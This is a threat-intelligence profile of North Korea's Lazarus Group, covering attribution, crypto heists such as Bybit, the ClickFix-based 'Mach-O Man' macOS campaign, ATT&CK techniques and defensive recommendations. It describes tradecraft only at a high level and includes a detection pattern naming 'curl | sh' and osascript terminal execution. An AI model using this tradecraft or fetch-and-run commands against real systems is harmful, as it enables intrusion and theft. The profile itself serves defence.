Lazarus Group

Executive Summary

Intelligence Cut-off Date: 12-May-2026

Lazarus Group is North Korea’s flagship state-sponsored cyber actor, operating under the Reconnaissance General Bureau’s 3rd Bureau and active since at least 2009. The group functions as the regime’s primary sanctions-evasion engine — Chainalysis attributes $6.75 billion in cumulative cryptocurrency theft to DPRK clusters between 2019 and 2025, capped by the $1.5 billion Bybit heist in February 2025 (the largest crypto theft on record) and approximately $500 million lifted from KelpDAO and Drift in April 2026 alone [Source: Chainalysis / Elliptic, Rating: B2]. In parallel, sub-clusters APT38, Andariel, and TraderTraitor conduct strategic espionage against defense, aerospace, and healthcare sectors.

Overall Assessment: [Confidence: HIGH] Lazarus is operationally peer to top-tier APTs but operates with crime-syndicate aggressiveness — a rare combination of nation-state resources, financially urgent regime tasking, and accelerating use of AI-assisted social engineering. The group’s pivot from infrastructure compromise to developer-workstation targeting (Safe{Wallet} → Bybit pattern) is the defining tradecraft shift of the last 18 months.

Identity and Attribution

Lazarus Group is the canonical name for a DPRK state-sponsored cyber umbrella tracked by MITRE as G0032. The group has been variously named HIDDEN COBRA (CISA), ZINC and Diamond Sleet (Microsoft), Labyrinth Chollima (CrowdStrike), NICKEL ACADEMY (Secureworks), and Guardians of Peace (self-assigned during the 2014 Sony Pictures campaign) [Source: MITRE ATT&CK G0032, Rating: A1].

Attribution to the DPRK’s Reconnaissance General Bureau, 3rd Bureau is established by sustained reporting from CISA, NSA, FBI, and major commercial vendors [Source: CISA AA24-207A, Rating: A1]. The “Lazarus Group” label is umbrella-level — the FBI and major vendors track named sub-clusters:

• APT38 — financially-motivated bank heists (SWIFT-targeting era, 2015–2018).
• Andariel (Onyx Sleet) — espionage with ransomware monetization, targeting US healthcare and defense.
• TraderTraitor / Jade Sleet / Slow Pisces / UNC4899 — the 2024–2026 cryptocurrency-theft cluster, formally named by the FBI as the perpetrator of the Bybit hack [Source: FBI Bybit Attribution, Rating: A1].

The boundaries between sub-clusters appear to be functional rather than rigid; shared tooling and infrastructure overlap is observed. Full 2026 cluster-to-cluster overlap mapping is [Single-source].

Motive and Objective

Lazarus operates on a three-motive stack:

Primary — Sanctions-evading revenue generation. Cryptocurrency theft funds the DPRK’s missile and nuclear weapons programs, and is now responsible for an assessed ~76% of all 2026 hack losses across the crypto ecosystem [Source: Chainalysis, Rating: B2]. The 2024 haul alone reached approximately $2.02 billion. This is the dominant operational tempo.

Secondary — Strategic espionage. Defense industrial base, aerospace, semiconductors, blockchain IP, and regime-relevant political intelligence. CISA’s July 2024 advisory documented a global espionage campaign explicitly tied to advancing the regime’s military and nuclear programs [Source: CISA AA24-207A, Rating: A1].

Tertiary — Disruption when politically directed. Historical precedent includes the November 2014 Sony Pictures wiper attack and the 2013 DarkSeoul attacks against South Korean banks and broadcasters. This motive surfaces episodically when regime political tensions spike.

The evolution since 2022 is clear: Lazarus has shifted from infrastructure-level compromise (validator keys, poisoned packages) toward human-targeted social engineering of developers and executives, with the developer’s workstation as the operational fulcrum [Source: Elliptic, Rating: B2].

Victimology

Lazarus operates with a focused but globally distributed target aperture. The bullseye is cryptocurrency exchanges, DeFi protocols, wallet infrastructure, and Web3 developers — confirmed victims in the last 18 months include Bybit (February 2025, $1.5B), Upbit (November 2025, $30M), KelpDAO and Drift (April 2026, ~$500M combined) [Source: TRM Labs / NCC Group / UPI, Rating: B2].

Active target sectors beyond the crypto core: fintech executives (now the primary vector for the Mach-O Man campaign), defense industrial base, aerospace, healthcare (via Andariel’s Medusa ransomware operations in February 2026), and academic research [Source: The Register, Rating: B2].

Geographic targeting is global, with the heaviest concentration in the United States, South Korea, Japan, and the European Union. Unlike Russian-nexus actors, Lazarus shows no observed CIS-country exclusion — geographic constraints appear driven by regime political priorities rather than safe-harbor agreements.

Technology stack targeting has expanded significantly: macOS developer workstations are now a primary target (Mach-O Man loaders, 2026), alongside Chrome (zero-day distributed via fake gaming site, February 2025), AWS session-token theft for multisig signing platforms (Safe{Wallet} → Bybit), and the npm/Telegram/Discord ecosystem for recruiter-pretext lures [Source: CoinDesk / The Hacker News, Rating: B2].

Sector Proximity Assessment:

• Global telecommunications: Adjacent — exposure is primarily via supply-chain pivots through vendors, identity providers, and multisig services, not direct targeting of carrier infrastructure.
• Defense technology / high-tech startups: Direct — defense industrial base and dual-use technology IP are core espionage tasking; portfolio companies in this space should assume they are inside the target aperture.
• Venture capital / investment: Adjacent — portfolio exposure through crypto-adjacent and defense-adjacent holdings; firms themselves are not primary targets but their portfolios sit on the bullseye.
• Government / think tanks: Adjacent — DPRK-focused policy organizations and military-adjacent research entities are episodic targets for espionage tasking.
• Higher education / research institutions: Adjacent — cryptography, aerospace, and blockchain research programs are regularly targeted for IP and data theft.

Capability Assessment

Rating: High [Confidence: HIGH]

Lazarus demonstrates sustained nation-state tradecraft across all four capability dimensions tracked in this profile. Custom malware breadth is extensive (AppleJeus, Destover, DarkSeoul, Mach-O Man), persistence routinely runs weeks to months (Safe{Wallet} dev workstation was compromised significantly before Bybit execution), and the group has demonstrated zero-day exploitation capability (Chrome 0-day distributed via fake gaming site, February 2025) [Source: MITRE ATT&CK G0032 / Picus Security, Rating: A1 / B2].

Evidence supporting the HIGH rating:

• Successful supply-chain compromise of a multisig signing platform (Safe{Wallet} → Bybit, 2025), including bypass of MFA via stolen AWS session tokens and UI injection at signing time [Source: NCC Group, Rating: B2].
• Cross-platform implant development: Windows, macOS (Mach-O Man loaders, 2026), and Linux build pipelines.
• Operational sub-unit specialization: APT38 (financial), Andariel (espionage + ransomware), TraderTraitor (crypto) — a structural feature consistent with state resourcing.
• Patient operational tempo: weeks-to-months dwell time, followed by surgical execution at a single high-value moment.
• Operationalized AI: since at least October 2024, observed integration of AI-driven techniques into social engineering — deepfaked recruiter video calls, LLM-generated lures, AI-tailored technical “challenges” delivered to engineering targets [Source: Expel, Rating: B2].

OPSEC and attribution evasion are assessed at moderate rather than high — the group’s operations are consistently attributable, and FBI/CISA attribution is rapid. This is consistent with a regime that prioritizes operational throughput over deniability.

Modus Operandi

Key Campaigns

Mach-O Man (April 2026 – present). New macOS-targeted campaign turning routine business communication into a credential-theft and data-loss vector. Targets fintech, crypto, and other high-value executives via the ClickFix social-engineering technique: victims are lured to fake online meetings and instructed to paste a “fix” command into their Mac terminal, granting attackers access to corporate and financial systems [Source: CoinDesk, Rating: B2].

Bybit / Safe{Wallet} supply-chain heist (February 2025). A Safe{Wallet} developer’s workstation was compromised via social engineering, AWS session tokens were stolen to bypass MFA, the multisig signing UI was injected with malicious JavaScript redirecting destination wallets, and Bybit signers approved transactions sending approximately 400,000 ETH and stETH (~$1.5B) to attacker-controlled wallets. FBI attributes to the TraderTraitor sub-cluster [Source: FBI / NCC Group, Rating: A1].

KelpDAO + Drift exploits (April 2026). Approximately $500M lifted in two weeks across two DeFi protocols, with preliminary indicators pointing to Lazarus [Source: UPI, Rating: B2].

Developer-targeting campaign (2024–2026). Cumulative exfiltration of 26,584 cryptocurrency wallets from 2,726 infected developer workstations in Q1 2026, exfiltrated public keys for wallets holding up to $12M in crypto assets [Source: Expel, Rating: B2].

Historical landmarks. Sony Pictures destructive wiper (Operation Blockbuster, 2014); DarkSeoul (2013); Bangladesh Bank SWIFT heist (2016, attributed to APT38 sub-cluster); Harmony Horizon Bridge theft (2022, FBI-attributed).

MITRE ATT&CK TTPs

Phase	Technique ID	Technique Name	Notes
Initial Access	T1566.001	Spearphishing Attachment	Recruiter-pretext lures with malicious attachments
Initial Access	T1566.002	Spearphishing Link	LinkedIn/Telegram/Discord coding-test domains
Initial Access	T1195	Supply Chain Compromise	Safe{Wallet} dev workstation → Bybit pattern
Initial Access	T1189	Drive-by Compromise	Chrome zero-day via fake gaming site (Feb 2025)
Execution	T1204	User Execution	ClickFix paste-to-terminal social engineering
Execution	T1059.001	PowerShell	Encrypted PowerShell loaders
Execution	T1059.002	AppleScript	macOS Mach-O Man execution chain
Persistence	T1137	Office Application Startup	Historical Office-based persistence
Persistence	T1543.004	Launch Daemon	macOS persistence via launch daemons
Defense Evasion	T1055	Process Injection	Custom implants inject into legitimate processes
Defense Evasion	T1497	Virtualization/Sandbox Evasion	Anti-analysis routines in custom loaders
Defense Evasion	T1036	Masquerading	Implants masquerade as legitimate developer tools
Credential Access	T1539	Steal Web Session Cookie	AWS session-token theft (Safe{Wallet})
Credential Access	T1555.003	Credentials from Web Browsers	Browser-stored wallet credentials
Discovery	T1010	Application Window Discovery	Standard reconnaissance after execution
Discovery	T1082	System Information Discovery	Standard reconnaissance after execution
Discovery	T1012	Query Registry	Windows host reconnaissance
Collection	T1005	Data from Local System	Crypto wallet file collection
Collection	T1114	Email Collection	Executive mailbox harvesting
Command and Control	T1071	Application Layer Protocol	Standard HTTPS C2
Command and Control	T1583	Acquire Infrastructure	Operational relay chains and disposable infrastructure
Exfiltration	T1041	Exfiltration Over C2 Channel	Wallet contents exfiltrated over C2
Impact	T1657	Financial Theft	Direct wallet drain and UI-manipulation theft

Tools and Malware

AppleJeus — Long-running trojanized cryptocurrency-trading application family, targeting macOS and Windows users. Destover — Wiper malware used in the 2014 Sony Pictures destructive attack. DarkSeoul — Wiper used in 2013 attacks against South Korean banks and broadcasters. Mach-O Man (2026) — New macOS loader family deployed in the ClickFix-based campaign; turns paste-to-terminal into credential and corporate access compromise. ClickFix social-engineering kit — Lure infrastructure for fake online meeting “fix this” prompts, deployed in 2026. Cobalt Strike — Commodity post-exploitation framework used alongside custom tooling. Custom Chrome exploit chain — Used to weaponize a Chrome zero-day distributed via a fake gaming site in February 2025.

Infrastructure Patterns

Lazarus operates a multi-layered infrastructure model. Front-end lures are hosted on disposable domains (fake recruiter sites, coding-test platforms, fake gaming sites, spoofed Zoom/Teams meeting URLs). Operational relay chains route C2 through compromised legitimate infrastructure to reduce attribution. The 2025 Bybit operation demonstrated abuse of legitimate cloud services (AWS session tokens harvested from a compromised developer workstation), and the group has increasingly leveraged fake LinkedIn/Telegram/Discord recruiter personas combined with malicious npm packages and private coding-test repositories. Full current C2 IP/domain inventory is [Data Gap] — publicly disclosed IOC sets lag the operational pace.

Activity Timeline

Date	Event	Source	Rating
2026-04	”Mach-O Man” macOS campaign launches: ClickFix paste-to-terminal lures targeting fintech and crypto executives	CoinDesk / CertiK	B2
2026-04	KelpDAO ($290M) and Drift exploits — approximately $500M lifted in two weeks	UPI / Chainalysis	B2
2026-02	Andariel sub-unit deploys Medusa ransomware against US healthcare orgs (espionage funding)	The Register	B2
2026-Q1	26,584 crypto wallets exfiltrated from 2,726 infected developer workstations	Expel	B2
2025-11	Upbit (South Korea): ~$30M in Solana-based assets stolen	Korean authorities	B2
2025-02	Bybit hack: $1.5B stolen via Safe{Wallet} supply-chain compromise (largest crypto heist on record); FBI attributes to TraderTraitor sub-cluster	FBI / NCC Group	A1
2025-02	Chrome zero-day distributed via fake gaming site targeting crypto holders	Picus Security	B2
2024-10	AI-assisted tradecraft observed: deepfaked recruiters and LLM-generated lures targeting blockchain developers (Operation DreamJob evolution)	Expel	B2
2024-07	CISA AA24-207A — North Korea global espionage campaign advancing military and nuclear programs	CISA	A1
2022-06	Harmony Horizon Bridge cryptocurrency theft (~$100M) — FBI attribution	FBI	A1
2016	Bangladesh Bank SWIFT heist ($81M) — attributed to APT38 sub-cluster	Multiple government and vendor reporting	A1
2014-11	Sony Pictures destructive wiper attack (Operation Blockbuster)	Novetta / FBI	A1

Forecast, Implications, and Recommendations

What Next (Forecast)

[Confidence: HIGH] Continued escalation of cryptocurrency theft. Expect $250M+ heists at a pace of at least one per quarter through the remainder of 2026. The DPRK regime’s revenue need is structural, not cyclical, and Lazarus is the principal collection mechanism.

[Confidence: HIGH] macOS targeting expands. The Mach-O Man toolchain will industrialize across Lazarus sub-clusters; macOS-heavy developer and executive populations should expect to see this pattern more, not less.

[Confidence: MODERATE] Deeper supply-chain compromise. Lazarus will continue pursuing multisig and signing services, CI/CD pipelines, and developer identity providers as primary leverage points — the Safe{Wallet} → Bybit model is highly replicable.

[Confidence: MODERATE] AI-personalized social engineering scales. Deepfaked recruiter video calls and LLM-tailored technical lures targeting senior engineers, founders, and CISOs become baseline tradecraft within 12 months.

[Confidence: LOW] A return to disruptive operations against a Western financial institution if regime political tensions spike — the Sony Pictures precedent suggests Lazarus retains this capability and will deploy it when politically directed.

So What (Implications)

Cryptocurrency-adjacent organizations face existential financial exposure. The Bybit pattern demonstrates that a single compromised developer at a third-party vendor can translate into nine-figure losses. Any organization where transaction approval flows through external infrastructure (multisig, signing services, custodians) carries this exposure whether they recognize it or not.

The developer’s workstation is the new perimeter. Lazarus’s strategic shift to social engineering of engineers — fake recruiters, coding tests, ClickFix terminal lures — bypasses traditional perimeter and corporate-IT defenses entirely. Organizations whose security models still center on endpoint and network controls without explicit attention to engineer endpoints and IdP federation are exposed.

macOS is no longer a defensive haven. Many crypto, dev-tool, and venture-backed firms run macOS-heavy environments under the assumption of lower threat density. Mach-O Man invalidates that assumption operationally.

Defense and dual-use IP exposure is direct. Portfolio companies in defense technology and dual-use sensing should assume they are inside Lazarus’s espionage aperture, with regime-driven prioritization of items relevant to DPRK weapons programs.

Now What (Recommendations)

1. Hunt for ClickFix-style paste-to-terminal behavior on engineer endpoints — Detect anomalous osascript, curl | sh, and clipboard-sourced terminal execution patterns. Build detection for the macOS-specific Mach-O Man execution chain. Map to MITRE T1204.
2. Audit third-party signing, multisig, and IdP federation paths — Inventory AWS session-token lifetimes, identity-provider federation routes, and any vendor with UI-injection capability into transaction approval flows. The Bybit pattern is replicable across any organization with a similar trust topology.
3. Block and detect DPRK recruiter pretext patterns — Treat unsolicited LinkedIn, Telegram, and Discord developer-job approaches followed by “technical challenges” on private repos or coding-test domains as indicators of social-engineering targeting. Brief engineering and recruiting teams.
4. Prioritize macOS EDR coverage and isolation — Many crypto, fintech, and venture-backed firms are macOS-heavy; legacy AV is insufficient against Mach-O Man-class loaders. Require modern EDR coverage on engineer and executive macOS endpoints, with launch-daemon and AppleScript visibility.
5. Pre-stage incident-response playbooks for the Bybit pattern — Build and exercise the developer workstation → cloud session compromise → wallet/UI manipulation kill chain. Tabletop with security, engineering, and finance teams within 30 days. Map detection coverage against MITRE T1195, T1539, and T1657.

Technical Evidence

Type	Value	First Seen	Last Seen	Confidence
CVE	CVE-2024-4947 (Chrome zero-day exploited Feb 2025)	2025-02	2025-02	MODERATE
Tradecraft	ClickFix paste-to-terminal lure pattern (macOS)	2026-04	2026-05	HIGH
Tradecraft	Safe{Wallet} dev workstation → AWS session-token theft → UI injection	2025-02	2025-02	HIGH
Tradecraft	Fake recruiter pretexting via LinkedIn/Telegram/Discord with malicious coding-test repos	2024-01	2026-05	HIGH
Malware family	AppleJeus (trojanized crypto-trading apps)	2018	2026	HIGH
Malware family	Mach-O Man macOS loader	2026-04	2026-05	MODERATE

[Data Gap: Publicly disclosed atomic IOCs (domains, IPs, file hashes) for 2026 operations lag the operational pace; consume commercial threat-intel feeds for current atomic indicators rather than relying on this profile.]

References

1. MITRE ATT&CK — Lazarus Group G0032. https://attack.mitre.org/groups/G0032/ — Rating: A1
2. CISA AA24-207A — North Korea Cyber Group Conducts Global Espionage Campaign to Advance Regime’s Military and Nuclear Programs (July 2024). https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a — Rating: A1
3. FBI Press Release — FBI Confirms Lazarus Group Cyber Actors Responsible for Harmony’s Horizon Bridge Currency Theft. https://www.fbi.gov/news/press-releases/fbi-confirms-lazarus-group-cyber-actors-responsible-for-harmonys-horizon-bridge-currency-theft — Rating: A1
4. CISA — TraderTraitor: North Korean State-Sponsored APT Targets Blockchain Companies (AA22-108A). https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-108a — Rating: A1
5. NCC Group — Bybit Hack: In-Depth Technical Analysis. https://www.nccgroup.com/research/in-depth-technical-analysis-of-the-bybit-hack/ — Rating: B2
6. TRM Labs — The Bybit Hack: Following North Korea’s Largest Exploit. https://www.trmlabs.com/resources/blog/the-bybit-hack-following-north-koreas-largest-exploit — Rating: B2
7. The Hacker News — Bybit Hack Traced to Safe{Wallet} Supply Chain Attack (February 2025). https://thehackernews.com/2025/02/bybit-hack-traced-to-safewallet-supply.html — Rating: B2
8. Picus Security — FBI Confirms North Korean Lazarus Group Behind $1.5 Billion Bybit Crypto Heist. https://www.picussecurity.com/resource/blog/fbi-north-korean-lazarus-group-bybit-crypto-heist — Rating: B2
9. CoinDesk — Lazarus Group has become especially dangerous with new Mach-O Man attack (April 2026). https://www.coindesk.com/tech/2026/04/22/lazarus-group-has-become-especially-dangerous-with-new-mach-o-man-attack-certik — Rating: B2
10. UPI — North Korean hackers tied to $290M KelpDAO crypto heist (April 2026). https://www.upi.com/Top_News/World-News/2026/04/22/KelpDAO-LayerZero-North-Korea-crypto-hack-theft-Lazarus-Group/6151776848419/ — Rating: B2
11. Elliptic — How the Lazarus Group is stepping up crypto hacks and changing its tactics. https://www.elliptic.co/blog/how-the-lazarus-group-is-stepping-up-crypto-hacks-and-changing-its-tactics — Rating: B2
12. Expel — Inside Lazarus: How North Korea uses AI to industrialize attacks on developers. https://expel.com/blog/inside-lazarus-how-north-korea-uses-ai-to-industrialize-attacks-on-developers/ — Rating: B2
13. The Register — Lazarus Group targets healthcare orgs with Medusa ransomware (February 2026). https://www.theregister.com/2026/02/24/north_koreas_lazarus_group_healthcare_medusa_ransomware/ — Rating: B2
14. Picus Security — Lazarus Group (APT38) Explained: Timeline, TTPs, and Major Attacks. https://www.picussecurity.com/resource/blog/lazarus-group-apt38-explained-timeline-ttps-and-major-attacks — Rating: B2
15. Wilson Center — The Bybit Heist: What Happened & What Now? https://www.wilsoncenter.org/article/bybit-heist-what-happened-what-now — Rating: B2
16. Security Boulevard — Top Security Incidents of 2025: Lazarus Group’s Cryptocurrency Heist. https://securityboulevard.com/2026/02/top-security-incidents-of-2025-lazarus-groups-cryptocurrency-heist/ — Rating: C3
17. Chainalysis / 38 North — DPRK cumulative crypto-theft estimates (2019–2025). https://www.38north.org/2026/01/from-digital-kleptocracy-to-rogue-crypto-superpower/ — Rating: C3